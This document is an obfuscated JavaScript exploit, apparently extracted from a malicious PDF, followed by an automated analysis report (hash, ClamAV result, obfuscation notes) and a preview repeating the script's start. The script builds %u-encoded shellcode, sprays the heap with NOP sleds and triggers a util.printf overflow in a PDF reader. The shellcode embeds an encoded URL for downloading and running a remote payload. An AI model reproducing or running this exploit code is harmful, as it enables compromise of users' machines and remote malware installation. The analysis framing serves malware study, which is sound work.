/*f2yU9sAE4LoP_EOKKHQ5pWgags3an1fNrSio_it4tWIsbW3ldIfHeAhAtZaWP7j7OGkOoSGXpPEF*/unescape/*CCrL7w6zaY8lbDafKk3xwATxCfwyp2g74NHy0*/(/*MZbj_3nZXx_OkwO4iQYTECJk0CyG1wIcLkAKbnkzakC_VR45iRNmTWMSY_YOwhq8GqGiTrWtQZtmrmf*/YMRwf_vXNM5H4yF)/*F_5zMFEq0JdHnT3bYO8P9qVEl7VlRHNBGG2TL60JEcRrvJIJYEYVvtZWpv884J90QyRctQmxs4ecBmmaqAvbtKxY7uUy5SxJ*/;/*bRcmU0G2EHiBf856_w5gtY_ASY4Bk5C0KekfcrWgz5iU2bP1MIV7*/}/*A8RrdOsS3fEp9Di1G8dO69QY5jdZGJAxFRdjgL2Xr7Bp0jeFf9Ua6lzyJSMQbNDhfgFAs8YY4ZC30h9eeR6Y3tMB*/;/*F7zty2Sr4Q3W2XzitVWm4rdU7ShDock0XZrKQ_3IPufG*/
/*EXCn0mfpKae_I1IBx5RRjk0yhcsD4nKUAN901co_3H0A8GCuATAk5_Yab*/var /*wqEEKMjLuj5I_PX7zTJ74XkLe81tA6T9lYBvkk8TJ1bJFzE5INzAlZMEVByW7GThfVRE6OXEDzNJoRCwf3xFQ0Km_997ERcjmuoh9AlB1yKeFNPkFBqWA29Az*/vN_t=h8kt7x2qzDsYJkfd(/*js2MEDedC3rzZXvfD3DWiZFzzzafa6vTmmgrp_Js32gRNRwQIzmrOsfDg6j8zTQb6wIjwRQoHx6VDqlMfN4u7XxcRVZGopijbqHN9Y2FKvaObBa8OS*/"%u9090%u9090%u0"+'feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%'+"u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f"+'3%u9f64%u6ee7%uef'+"03%uefeb%u64ef%ub903%u6187%ue1a"+'1%u0703%uef11%uefef%uaa66%u'+"b9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca"+'87%u105f'+"%u072d%uef0d%uef"+'ef%uaa66%ub9e3%u0087%'+"u0f2"+'1%u078f%uef3b%uefef%uaa66%'+"ub9ff%u"+'2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%'+"u6615%uf7aa%ue806%uefee%ub1ef%u9a6"+'6%u64cb%uebaa%u'+"ee85%u6"+'4b6%uf7b'+"a%u07b9%uef64"+'%uefef%u87bf'+"%uf5d9%u9fc0%u780"+'7%uefef%u66ef%uf3aa%u2a6'+"4%u2f6c%u66bf%ucfaa%u10"+'87%uefef%ubfef%uaa64%u8'+"5fb%ub6ed%uba6"+'4%u07f7%uef8e%uefef%uaaec%u28cf%ub3'+"ef%uc191%u288a%uebaf%u8a97%"+'uefef%u9a10%u64cf%u'+"e3aa%uee85%"+'u64b6%uf7ba%uaf07%uef'+"ef%u85ef%ub7e8%"+'uaaec%udccb%ubc34%u1'+"0bc%ucf9a%ubcbf%"+'uaa64%u85f3'+"%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue"+'7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%u'+"bdb4%u0eec%u0e"+'ec%u0eec%u0eec%u036c%ub5eb%u64bc%u'+"0d35%ubd"+'18%u0f10%u64'+"ba%u6403%u"+'e792%ub264%ub9e3%u9c64%u64d3%uf19b%ue'+"c97%ub91c%u996"+'4%ue'+"ccf%udc1c%ua626%u"+'42ae%'+"u2cec"+'%udcb9%ue019%uff51%u1dd5%'+"ue79b%u212e%uece2%uaf1d%u"+'1e04%u11d4%'+"u9ab1%"+'ub50a%u046'+"4%ub564%ueccb%"+'u8932'+"%ue364%u64a4"+'%uf3b5%u'+"32ec%ueb64%ue"+'c64%ub12a%'+"u2db2%uefe7%u1b07%u1011%uba"+'10%ua3bd%ua0a2%uefa1%u7468%u7074%u'+"2F3A%u642F%u7077%u72"+'6F%u6174%u2E6'+"C%u7568%u702F%u6F72%u7267%u6D61%u752F%u647"+'0%u7461%u2F65%'+"u646C%u"+'2E72%u6870%u3F7'+"0%u3D69%u6C73%u"+'596C%u4A63%u'+"4D34%u652"+'6%u703D'+"%u6664"+''/*ZlzUNlBFF*/)/*rrFhWFSyzckNYUiLNWozpAbir53nMYr11QyNqfY7ePEu0j1F4e5ieUFLO9yNePLvDZbixWBCavB_lG4EAajVgujei_1CPBxSaN2Nk4PAo*/;/*JOX4SXT3szlRSJQILfJ0yjMowwgBxKSxYpprB9iuxJAFSQNewWcj7oNrZttM5A0Rqn0slhbXqbc0spceA5C7hPn80WJ3WHJBvHtVoKsUmKST1vx1o1wLFZIDvR7HZEJJJUtoou3ltrDWq6dp7Zw9JxRKWKJull1F6jtiSlJARMW8HzmCOXAYJSigcrQDRFIz3u8c58tFSqMHRPWpQuziRUA0lDPqLbUCLQfENNJf5WnLm023tpa__a9keNQpols13M5EaDjTaMeBLU55_U5*/
/*E2jNE14saliRxbVNe6g5HA7SV1MVJFU585HAt_tJlQbXsxlLsGFzHBHd2Ty_YH5VAAWuAE4lVU0CGjOyqTmxVtPLCDLbLEwL*/var/*C5MZczIGVGH7I8uTazgqZmrF9s76sv1ooCCG2LMLSTHaP2uqqQVE3CJzuFuc1kFdmIjdTwpmEwBUnw_SBVW5YgtIlckbCp6pyeHGPxsTiunLgndh91bVVJd8l*/ /*SosTSgxZmBLUVuE06klYHjNi5jsXgTa68INOo_nQBzlXjpVeP73*/G4q71l="";/*he1CMKoXd8MNuC3jzDoNMs0enG4rPB5HgtJs5xFWtRkdTcCHgrVsZTLBZEtpFmwlV6TPrYmapL50o7FJna3BuDDJHwyMYjyudH0KfkkKweIaZOjC*/
/*i7FMzqhIojOMxC4GoxX6nZ0z2J5mV0uQD7EudNYCcl1ed8HIYfCA6A1vJtXesHvwC1fgC4ieeX9HFEslHsfHiQRRow0vhuyWPTYI34mP1ij7mQgu9B2gRF66vqbfdxuwL3oDd45BbzorVXpWOKoW9jRsOsMsf8eqyHtR_nSbb7HxSxIg8x45WJml3zSWvwBj5v14XHUzCblVNu2KhuE44reugw*/
/*EiI1b5pUQxoF1FrKTbBe9vi2oPUYvGeBom2*/for(/*nqdm8zADdpmBGSITPhJUs6*/iCnt=128;/*GDYfGhm4UzR4nAWu_hOkHZVlhv_vUCZwFxQMU3EorWhTW5CVaR6hqQHNB*/iCnt>=0/*zVJYHPLXbfPgJ73qOOkRj_iehOvpcwxbH7zOLAmmf2Iow_U_N5Rx5zRbDBFgy387ywJ0wvlRmt7XsQX7KosDd0fhAkCzb_uPw5NioyzPhvnOA_JKo3OG2to2TqpvqY*/;/*ORN07ByLiizwjz7ucx0jnsMeA4Jviiu0199v0v8gTwS4kNmBAlkoSwISo*/--iCnt)/*wW8B9vVLWXQb2YH87eCOR3r3EEMnPZdNwZPtJk5g9K9yjFvfjyt2pZtud6WtUz8FNLyXvs5s42gc7R8fEpWuEFdhA1QUpMZ3XNPI7I2z_XQ7oMbt3yd847e4wuNa*/
/*RgZxSD3HIjSb_T68EdyssHFdOke3LU9r1WeIaVPi5i_42616YnnGvsj0RC2dXyKNKo*/G4q71l+=h8kt7x2qzDsYJkfd(/*GVwVSAo0KTbwQQxUtc7uiN43cZBxH7iCRUYjVCifV_RmPD79f2sDEl6h_8UH33JJMithkQC6PUhfYcc5TK8Yv36vyP3qHAzTji2Iy4DDNkilBAeVKbt6Top*/"%u9090%u9090%u9090%u9090%u9090")/*mST1hcvqSjqpzlTBCC51f1sbTlMDym_a6SPbuAHCjxrYYAaaDTQiJ9_cjLgXyfxsyCJhCQjmDQAcRa4UVMzyKovIi4WOMHhErvrtvRSZjEh3tz66nsFRdNqLGCaSJ8W2rDjcU3257YwpMrj1ZpG33xC9zcQ0Zm1FqYhAPY5Lxq1_WZzvD7m7sShHJggwVlbuIb_hVLUBATXaHIeCvZvZTSgcyBOJnq5wH4TcDndE72fC00FtY1IsIoK8pYFSD_DK3Wn70GA58g87fBp43xkAau8FICXMBbW5x_1wF2qCK02onugZTg1Dc6LeSYftvYguOR1E83ai1QMd_s4TNsXpnjI68oorCJbQaQUXIv70AHbAzTUCBrroQ1j*/;/*kM5gVUxwkGIs2Dr3LH4AbNCc6tGKjpWC2QiLkU9JbG3SKiKVqDVHQYjKGqVqUsN_lI5IHw_Cm6aPhh_PF0gIz_gnKtxyDWyoerxmdwoEqETNlTcrS0zH9UuIDg7G3uvWai94Tm8_q*/
/*uRkp94ox_mHtuKPqRHZCdzkbr5Co*/
/*x6GAfv0XYvWA4FuCUZUbyW6n7VT1Y9tH3zHWkGu02F0tLswfHF87b3iXN3Mlz6tru2DU8xSy4RgD_SjGXgBzXkLkbYLQT5*/iF3HUFMvuX=G4q71l+vN_t/*z9QWhlUrCajUkHf6xjQ6zoeMJUadBHo_Y_g0TMAuvVT32NpZejOHCO3LjSpkaSjySFxmSyVDJo6_3kZVJodL3VXanBACUk2mqnO9bjAkM7kEf_Zon31fMN61*/;/*q3jgtKLWYIx9JWKE8Ok7nNifDDsQ9hf5ZDaIOlenuQk4nu9j9helvCGyFyEDVj9vmX420WdsmClPxiyuESVzVbnaPrelPcV3zNsxkKeMNFb_nOurgFf2gHRw*/DOYD5yQFCY6Q=h8kt7x2qzDsYJkfd/*Nhx_imSGJIO9BRBO2j14jUNuw8pEkUMc2_bYmuew4st60vJ1T0s4S7mE3RJblV5bUVz7FSs9Aa3_LA1e_hXSc_WUQfw21qRKAGGFZyDaO6ZZ7O57w*/(/*vOQjigDUX5_oE_vKFJ9IjMD0l_Mf*/"%u9090%u9090"/*u44G3VpD2B2VzjI3sqdPgBggdy7WHpeAik34P6uQwEFUN8B52_JWBp3fcy2kcUk_5c4IWmZHqfc5cdySd8oelg0DTznvINvCpnLBOlJ6GlziDm1hjeAJ__NSy2D8Dz_tbKuqw4l3dZahBPDlEutD8B3xFy25yjV0SAuLlmp_BLBRPlAUUuXQwPD2D6u2eEzxFj9rLmrNyseDSfXmPv4A_82C3l5VqtHvRFbcsHqfzKiGp6Apm5pivsZVlvAT3wk9MCpUtKI4sPhn0bSkV9IFphbPRciJNIHaLwu584woITRGukrEhzKLVmbnD0xQH6rSqaMmT9QbQihAIOFqCQ2Y3SB6QzLYt3qZS3*/)/*A1RBG1jG9xLn1beNTwONCCZavRGJj0KKzcL6SvAPiM4XnXk7JzJM2jnm1uwZs8jgYvbqfb7CozaRMdWDNs7B7nzfyTrBYHAAWvr41MuWUAHIxeM_LHBHu1miJSjhakixVPpKbYhwZp5LIGLUNMb9CDfLWEtwpRi_gNK9lruAVnLeuWy8*/;/*b5mSZypegbJx_ITMSRy_AyUo_yXWmT63NkvBXrzpenAv6SUBq1DeMnqwEE8UX2SalTxRHcwzYxjTE4UvtXO6A6rE0oZWerwE_jWHBI7Z6fs0YCuGa0Ba4se3V4Nzk_5jjQrkYn0SHrRftAmJ0nj3VCtq78ff7ZEfp*/
/*fCXDUfulAd*/BM=20/*pnUzG1PQnOY8arNOqNB_2AUXZhSQuzaXIPe0eulsHiIzvWe0YezkCwrjD8T3Xq_nJ9G5jzAH8z4TT2rxqGEs3vR6ExFRxsavyUUmUbjJT4dJkP1qUhhEzcwZP2qBjGwWaF0vhi61bX_Anzr8WOAKqxj6oP8MVtjwyigVpKgxKha_NWVbXgHJFCyU0_qribfG81LXAsKLPkKd7g5TBBcGDPbCPGuMP5eEF3FyBRCmbfi9Z20bTFfighynRlKgfplkgrXi9aJY7rWVhUw1ZQY7yLiFxtlRXL244*/;/*p1okOkQk6y5roT8BPvNy1_gbR4nIwfWMUAwjlCIf1CLdWIfl5sZts6K_*/vgxlV1St03Nch6r=BM+iF3HUFMvuX.length;/*OHjSewnfhLFkTlaWw5s6YTyGthznryae7_wZvY5Sk_35kRPVK9QjRDq_kemRSCvNBhmx6gEeg7YFNnbYkr93un2UGdlZfVmh3OTxvXUmkPLbkNKQJGvoCJthzdl22pKWZwW3X9e8MpYw4iCCpxqr8ZOw41mtexE4jav7YO4k5QWxzYzeLfLI5LwOgesSjl2_VxXkp9d7UPvtEO6jZDcz9NCdsvwRVnQqZoPEmt_80vpC_kmZnDNkQQD0AzPWbgB1JR6vA6s_pXBp8nDkrRK9hN7hCL5dr6T1MNlNHSMxq*/
/*um3fMiwWgSkb1nmtFToZI2nuDvCPise0UVeg5P4Zhd1XFcFLwul6kNon0r*/while(/*zvHMBrvhvE5oEisDS4Jc2SBCV_oVMIPK5XX6DIcyMWcR5KVMCep4wq7Hpjc2srBlDYgHh96tUWANgVajzEbluXsY7JPn2RO6qvBMt77CS7QzQqYFuzqdLX3HhHvXY*/DOYD5yQFCY6Q.length<vgxlV1St03Nch6r)/*wVzWiq7KRv6DKn_tJXdkD0B_Bpyb*/DOYD5yQFCY6Q+=DOYD5yQFCY6Q/*fTpVgSx64d3uNekhlCI_iemFW2YIlwa2EFMB_gPcX_q3jNcmVcKzEPK6oTfZtWezjFLilbA0aq1_4SmOvxC1*/;/*xupgPEPmjEKoQtPrtOHZDHRWugHgiHYWfts0PlNH_vl1IrSN4D8d9hrmJpSCKrZqZGoos3wrmWhuDz9736Y1bEblutn6ZCkzIc2FNiskEco4ajvU8lvBBWwv_qJBQ9SaBkojROnu3gJaRdX3OZ5lKok2ylHwwmLxL1VdD0M6fVVxzsoDHioSLNI_zQvk38*/
/*Iwrgzqtu*/
/*JE85xl85Jl*/LMMOHzOq=DOYD5yQFCY6Q.substring(/*KDuSPdOKfhFvWWaubKiGouef3BnnYAmqEW0Tz*/0,vgxlV1St03Nch6r/*GbFPf57aENL0QVlPDunhTrfUqg_e86eYC1ohuj9ywIxCdXShUDbmjvSEvxBpQasGDO1nMoZUabyxtV5oZVQ9FjC1VEfmeMsibiKnLk9lAwYtGSXgnodtMgjilDJEP3nrZyTkXRLXCjGJ2epeIIMUov4OyBTD48vRuE3HVCfWmhdGM8OUIj04bNrcgvVdfnNjeU6h1SIb1mhBiwWqUUjviPNEAihfKuEpE0M5RVVG84IeoeJ9zttX97*/)/*dd9eosiTwhfqy1A6w4CPghZeWHMuFHKDlIhP1FimmCSa3SVoLY4r7SKSZXBffLiFUFVKK4wx7DNxWiah8TO3lYJAwKfQWDWqIr2TkmGfqUSC4tjzBxqnL1n8_INWL*/;/*PwrNS8Rhi1lte2buiK9qjBy2XhWfD6clqJy9FEfo6GWZ9yIg9FLgG0Wegt_jnbJSk8QpBv*/
/*OzUTnkEMcAifwPBl7uUFyYCrKooExPPHDjbqJf3lfaF*/xktOqvnkBrtOrbJm=DOYD5yQFCY6Q.substring(/*oTukEF7ezWpXdSH9y00alWbNCfjAzYNSr83wCyQ2J6NnMUkATib663H8Xr9LEKe*/0,DOYD5yQFCY6Q.length-vgxlV1St03Nch6r/*ZUP4n1rULDmN7VwuWja_vPnrPv5m8doQtg5iBn4MrfZm1LWMvxLfBzMRjF4gjhxRCq1ETsQ_MqmB39NmuZHwNTDxZ7S9cFOfvDkEw*/)/*T9gp_YnNA*/;/*L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7pBblr752760fiiOds6phmloQYaP_pt7TuW5bSxROrQuPy9tg3XCe0quXG_XvsSEcp948vJLca6rN3auuywIG3l2LrpkuWvX_zKODRSns9wN1WsPc_6j2gaCMEn7aXTaLdpPu84c5opuAX_dX5CNZcQmg4h8P1WbTArC9jf3NfOikr6euI5LYfsQCog4_9LAoO0Nt1a5bpbAVWfEeYQ459J8lpzln_mQNle8a522iS35oX0IwPAqMJmzaZbaBsomLlCFb5ouwiYIhg5whk0rLxgmM9BNqq13Q38swlbhJ1prVjd4IbkUOF7aC9osnek5VhlGHCnR3S9N3aFA3pUFvQgyNJg2nF*/
/*tmUFuXtAOB9c4Yi5PNOV9e2vsARioWRn9msr0bsNcqqVDNOTadoY9fJpgaNKxfxuGfbF7JTXz0s4M8Mma2AXVKB3kPBWuyG1Si7NrPlgNTZZQlBqbCCxMEoxTpJCdP*/
/*Gyz0fDkAQ4ZqJ_szau2M762tOf3Q0GIu68sZASZQLz8UzoIPY_cU6SCIy5ZwAif6fNTfftvrisAWWJluJDDDVFMI_l6_IZ5nnM*/while/*RWhJJx_TsN76if62D*/(/*R9N56kk4wpCPbKl9UuvTCch0XEeR7hnrf1laaLSL1VbQfCOzx_I1cqyzuRGqytXSj9t_IAK0VmP1oepadyP7dDuMU24IkPbJNJI*/xktOqvnkBrtOrbJm.length+vgxlV1St03Nch6r<0x40000/*cHJ1aMmzI6wl_AFvEqz2g4yBhyaKAainhrc94ExB_im_jsuoXje4bS60FUIGvqtSXLPQQBRPk5PJl0x0*/)/*s20jw8oFFv2wdIIpYY6ZqK_jZIJY7I7M06wuT74zdlzz80aqHduKzzPy93yGRru553Czv2SVqHSoh9vAs7zgSxUQoHW7zF1s93hsszDY7VBdTweArSh_F3Pt_loyrefpVCXD2abxwcPEOtF7Bm6GdJ1dveQc9wHSyeWp5xbpPqudZzYab*/
/*S6dWXO1nqxZxFNRb3KNS1c0j7XYTyznUtFrFTgt_THxYVD1MODfDfdnb2AupzX_icqnvM*/xktOqvnkBrtOrbJm=xktOqvnkBrtOrbJm+xktOqvnkBrtOrbJm+LMMOHzOq;/*Vc8Ji8gTozXFeV0bFImiigPvYpfHcQVOsSXQO5j3t89MR7nXDP6lvJWIy2QQHlez52EHuo_dk8p24SO7hIhSS5bGvrW3S1rLqvTazgeh6zluAzxg3S0et1fdeT1d3RJfCW2y3VUwJ6gKtSqlkpFTekw05lcv4mP79GtzbDll9GvrZbS_FXSk8Di2pAlim2ej8MYYQSOFu6eLMdRkw2g1ZWfa9DByhlvu0J_0IND4IiDVBV6xLbnlyHBvKCjrnUbmealmoofwMjGO5BBFcorPwsA7uknX5D_YekAHOf4bE_p9AqCcUusFbtBLSoiMsikLHlT*/
/*SLxJLbHLHKoc5*/GWn=new/*eF6YpmwL6MF2VTE0TsPUh1rFfCku0cGdiB2MnnYizeZJxeIFLYatOHztKYdI1klYzkNE0w5cKDPoMV1kwiz5XiDvALllw0LNjZSiKLAUPQ9blyBXV1QsXTdYeEFDKenjwKt9LDMbBnBzoYKep439WQcaPteZM*/ /*r9Ss6dvH5xu7lYUv40ou8_AYaPH6oTBnRTUMwETq2Clcb6NT52D11DOQTVK9oLk7f5HQ9a8zdhQ6cdOVURLJVZaovklYwKUQDbhB3d1UAGOckcy5u0DFYdtICUhzf*/Array(/*BTUe6jUjC00gwObORLblo18Kqtoz3SMPMm7XmewvoKqwG4vApf3EVzOAi31ZKCpXokuPEgAsqqe*/)/*qOxNuoSEdgFAY6Zj8D7lop2sK2Z2g5nFIZT3Dl7gHBhg78E4A_dopTV1JvqqoTwxsEovpkRxlr4_Pi1H1DDXMlpeeFlOx8FFwwRchk484w7ITwPJVgB5LgYRGmDCsJzeaQBAI9555BNpRWek4geEB4VIeMMi_r0Ps0Yq3Sj5gOK4svvN*/;/*gPGLXlkiyIheHxMFL49ec2_qB3YwnmAd3GoPsNxgWUAdHMjSFhxhYxNZpmKROKuFRXU_lHf8bfais02xgoU5aiSEKdWYoGd7ey6E6aBW6b6*/
/*iUEjfWMDi6lIFstZEzk20vRF8ZPl2I8YcA89XJA6ElDKTwjXlINj5fo265bwCXKfYGcvQc*/for/*TtmjJvwT4HcLb7G_PpCOniA3_OIKquM_dzinjT7ba*/(/*E2Tt2jX4xAbx4aBAlsvyrNmO1Kiwm9IOzc9qAVjyWAlOamOBT01AMbOBmwyOu7djXaOYwyLHywVOYjPsi*/QAU=0/*Pwa7Zu11SI6clQ2PWTK1HF6Cf7YaXSCyEcudMjTfrN8Sdxh1GspOykQ*/;/*lot48wqAOaea0x7q_49cqfSwM9A_hQSC6B63xl3AAVb0IWoHPmk6G3qTzrTW8lY3nS*/QAU<1400;/*b5la5824ENhMcIxWPoCjdu31rdNiFgQeZ26SxwL30tDb31yGe2p9k*/QAU++/*NhvWZvW3YALu1UegAIzw6g1jRfIjRuXkQH7q3Si*/)/*Yt_ICdoDldzg_oEQJNzb9LAOT85KObahKZqN4TQMDtfXfDuGM9pGdT8XNYJPwTuKaL6qokAsTfEzjz6vwk2rynFMwV9EEHeQCK5nLl8qqvPeq_QP2fHpIN25jz9n8c40mxmxYidDSti9szMjTUNciEVG4TuzvnyXZZKy8o3PWZMDNZnhu10S6UZxnImYvavKz70wjL6P*/
/*UdnlAXb_pVTDI8MuU8JFH0AFuk7veK0comCo0ennz7r834rM11R9zSCi30TWJSyx52a3UDfJ0LF2DwD5mV2an50f4R2BjpycfNU1Qz0P_DGD1J9cfy3Hs1nkHelrI*/GWn/*gzzJe3AJDMROq6Wvt*/[/*BtgErhpK7Nv1u4oiBIZCSdPkr6eCqNqU7MYmtDxpQheAaIjbR9djbtIHnnKT12nwCBYwFKaVs6WHC6jU4C4Tv*/QAU/*GYolrdbUPeWnPbxqxflImoCK97N2P93qVgRC_tWOMs2cJoI7ItDvWG6UBiRFC8biNdh81wJimlrPumYdK1wDJyLTERWBs5OKbLA*/]/*Jiy7PDp2cHgk9RoGFzaJFwKypZ0Fk0S6hF1wJemlmI*/=xktOqvnkBrtOrbJm+iF3HUFMvuX/*CQ__zEfEj57dMtOYlNGop0edE9Tu75QsKQs0VND5H0XUsmsS1z8exa83YQmTJ4BTIuRe8VXDTvXBXFUM6QqrrnjE4KYCDZWMJnqF0*/;/*eSygTKmnWg5CNkqxoi9C*/
/*Anmdd4RbIRfPVVZSx5Fo*/var/*kjRlkIEadEh*/ /*nGKV_5TD0rgszjBWXhMbFeCqnHFFLmxtt8Dt2XwzDRh41jONFbpK6r1hy7m_iZtQWw_NI*/bUJR8tSnc=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;/*wc*/
/*zeoYlH0SPXb4_5V4LwAdRPymoFYhLCi0gMWHTVZjt1bsuxk7jlY11LceR1Bc4kbYwyfFI5p2uGje4IZctxSj0uDPkFscpI2b8VhFPL8*/util.printf/*pvg7xIskWbfzA4POQABcHzNcClBSTkXAU58HCorYFMNGEdUVeWxlLADOmFh6q57Ay3H1gyOm_csE6CaYYN_kNCyzIVu*/(/*npyCh73DtFpthXxcZN1yazYn3McAhMy*/"%45000f",bUJR8tSnc)/*bE_wtEC3S2TPCTeVPXgez7B_VrMNAcrxhqiPvkHCbaSeuw1_JVe0Rf9mLJzLmg9IMgX8Gf_i7RBpD2pMMIKdnIFzR5_4Z9AleYik5*/;/*Flk3qi611tWI59wPepSsP9e5gb7*/
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 6 at offset 0x179 13182 bytes
SHA-256: 8933be9c1fe6caeb5752ec29ffc4b89ace44889aa5b35b30d49103ad42d93745
Detection
ClamAV: No threats found
Obfuscation or payload: likely
100 of 115 identifiers look randomly generated (e.g. 'L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7p') — consistent with name-mangling obfuscation. Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var /*JfdKo3nWp67oo_4OEkruthLp3tuH5qGLLjWzb0*/h8kt7x2qzDsYJkfd=function(/*lNe8cKjUj5d_K4HoXWuh9W2uznFEBDe6Q92sHZCrTfqdYyGwJ2SHNJ2Bx8Fz_kuPhl9pAAVTgBx5z4q0u9G8H8065Eu4odILDG1DGKWnLIgABL0wJF*/YMRwf_vXNM5H4yF)/*gmxYipcQvH_Rewu5_jrZYEBQQeQyqEiirV8OAYfvfeC0Qw3PVjotoq_6KQs2VQYBmUQmsvWNPYMfKEvfnZNRENLPd5FyJe1vyFWg2ttFH7lR_VwXazqfnFpt31ggOemzd5u__jvJDXupf6O6t5aW0EF15mWIG09j4ri4PSBSqv9KqLFZFgwEk26e*/{/*fniPkHIRpAg9Bznxxyd043DYnH0eBd8SFfiq*/return/*E4GthFmwKMc570*/ /*f2yU9sAE4LoP_EOKKHQ5pWgags3an1fNrSio_it4tWIsbW3ldIfHeAhAtZaWP7j7OGkOoSGXpPEF*/unescape/*CCrL7w6zaY8lbDafKk3xwATxCfwyp2g74NHy0*/(/*MZbj_3nZXx_OkwO4iQYTECJk0CyG1wIcLkAKbnkzakC_VR45iRNmTWMSY_YOwhq8GqGiTrWtQZtmrmf*/YMRwf_vXNM5H4yF)/*F_5zMFEq0JdHnT3bYO8P9qVEl7VlRHNBGG2TL60JEcRrvJIJYEYVvtZWpv884J90QyRctQmxs4ecBmmaqAvbtKxY7uUy5SxJ*/;/*bRcmU0G2EHiBf856_w5gtY_ASY4Bk5C0KekfcrWgz5iU2bP1MIV7*/}/*A8RrdOsS3fEp9Di1G8dO69QY5jdZGJAxFRdjgL2Xr7Bp0jeFf9Ua6lzyJSMQbNDhfgFAs8YY4ZC30h9eeR6Y3tMB*/;/*F7zty2Sr4Q3W2XzitVWm4rdU7ShDock0XZrKQ_3IPufG*/
/*EXCn0mfpKae_I1IBx5RRjk0yhcsD4nKUAN901co_3H0A8GCuATAk5_Yab*/var /*wqEEKMjLuj5I_PX7zTJ74XkLe81tA6T9lYBvkk8TJ1bJFzE5INzAlZMEVByW7GThfVRE6OXEDzNJoRCwf3xFQ0Km_997ERcjmuoh9AlB1yKeFNPkFBqWA29Az*/vN_t=h8kt7x2qzDsYJkfd(/*js2MEDedC3rzZXvfD3DWiZFzzzafa6vTmmgrp_Js32gRNRwQIzmrOsfDg6j8zTQb6wIjwRQoHx6VDqlMfN4u7XxcRVZGopijbqHN9Y2FKvaObBa8OS*/"%u9090%u9090%u0"+'feb%u335b%u6'+'6c9%u80b9%u'+'8001%uef'+'33%ue24'+'3%ueb'+'fa%ue8'+'05%uffec%uffff%'+"u8b7f%udf4e%u"+"efef%u64ef%"+"ue3af%u9f64%u42f"+'3%u9f64%u6ee'+'7%uef'+"03%uefeb%u64e"+"f%ub903%u6"+"187%ue1a"+'1%u0703'+'%uef11%uefef%'+'uaa66%u'+"b9eb%u778"+"7%u6511"+"%u07e1%ue"+"f1f%uefef%ua"+"a66%ub9e7%uca"+'87%u105f'+"%u072d%uef0d%uef"+'ef%ua'+'a66%ub9e3%u0087%'+"u0f2"+'1%u0'+'78f%uef3b%'+'uefef%uaa66%'+"ub9ff%u"+'2e87%u0a'+'96%u07'+'57%uef29%ue'+'fef%uaa6'+'6%uaff'+'b%ud76f%u9a2c%'+"u6615%uf7aa%ue"+"806%uefee%ub1"+"ef%u9a6"+'6%u64cb%uebaa%u'+"ee85%u6"+'4b6%uf7b'+"a%u07b9%uef64"+'%uefef%'+'u87bf'+"%uf5d9%u9fc"+"0%u780"+'7%uefef%u66ef%'+'uf3aa%u2a6'+"4%u2f6c%u66bf%u"+"cfaa%u10"+'87%uefef%u'+'bfef%uaa64%u8'+"5fb%ub6ed%uba6"+'4%u07f7%u'+'ef8e%ue'+'fef%'+'uaaec%u28cf%ub3'+"ef%uc191%u288a%u"+"ebaf%u8a97%"+'uefef%u9a'+'10%u64cf%u'+"e3aa%uee85%"+'u64b6'+'%uf7ba%uaf07%uef'+"ef%u85ef%"+"ub7e8%"+'uaaec%u'+'dccb%ubc34%u1'+"0bc%ucf9a%ubcbf%"+'uaa64'+'%u85f3'+"%ub6ea%u"+"ba64%u07f7%"+"uefcc%uefef%uef8"+"5%u9a1"+"0%u6"+"4cf%ue"+'7aa%ued85%u64b6'+'%uf7ba%uff07%'+'uefef%u85ef%'+'u6410'+'%uffaa%uee85%'+'u64b6%uf7ba%uef'+'07%uefef%uaeef%u'+"bdb4%u0eec%u0e"+'ec%u0'+'eec%u0ee'+'c%u036c%ub5'+'eb%u64bc%u'+"0d35%ubd"+'18%u0f10%u64'+"ba%u6403%u"+'e792'+'%ub264%ub9e3%u'+'9c64'+'%u64d3%uf19b%ue'+"c97%ub91c%u996"+'4%ue'+"ccf%udc1c%ua"+"626%u"+'42ae%'+"u2cec"+'%udcb9%ue019%uff'+'51%u1dd5%'+"ue79"+"b%u212"+"e%uece2%uaf1d%u"+'1e04%u11d4%'+"u9ab1%"+'ub50a%u046'+"4%ub564%ueccb%"+'u8932'+"%ue364%u64a4"+'%uf3b5%u'+"32ec%ueb64%ue"+'c64%ub12a%'+"u2db2%uefe7%u1b"+"07%u1011%uba"+'10%ua3bd'+'%ua0a2%uefa1'+'%u7468%u7074%u'+"2F3A%u642F%"+"u7077%u72"+'6F%u6174'+'%u2E6'+"C%u7568%u7"+"02F%u6F72%u7267%"+"u6D61%u"+"752F%u647"+'0%u7461%u2F65%'+"u646C%u"+'2E72%u6870%u3F7'+"0%u3D69%u6C73%u"+'596C%u4A63%u'+"4D34%u652"+'6%u703D'+"%u6664"+''/*ZlzUNlBFF*/)/*rrFhWFSyzckNYUiLNWozpAbir53nMYr11QyNqfY7ePEu0j1F4e5ieUFLO9yNePLvDZbixWBCavB_lG4EAajVgujei_1CPBxSaN2Nk4PAo*/;/*JOX4SXT3szlRSJQILfJ0yjMowwgBxKSxYpprB9iuxJAFSQNewWcj7oNrZttM5A0Rqn0slhbXqbc0spceA5C7hPn80WJ3WHJBvHtVoKsUmKST1vx1o1wLFZIDvR7HZEJJJUtoou3ltrDWq6dp7Zw9JxRKWKJull1F6jtiSlJARMW8HzmCOXAYJSigcrQDRFIz3u8c58tFSqMHRPWpQuziRUA0lDPqLbUCLQfENNJf5WnLm023tpa__a9keNQpols13M5EaDjTaMeBLU55_U5*/
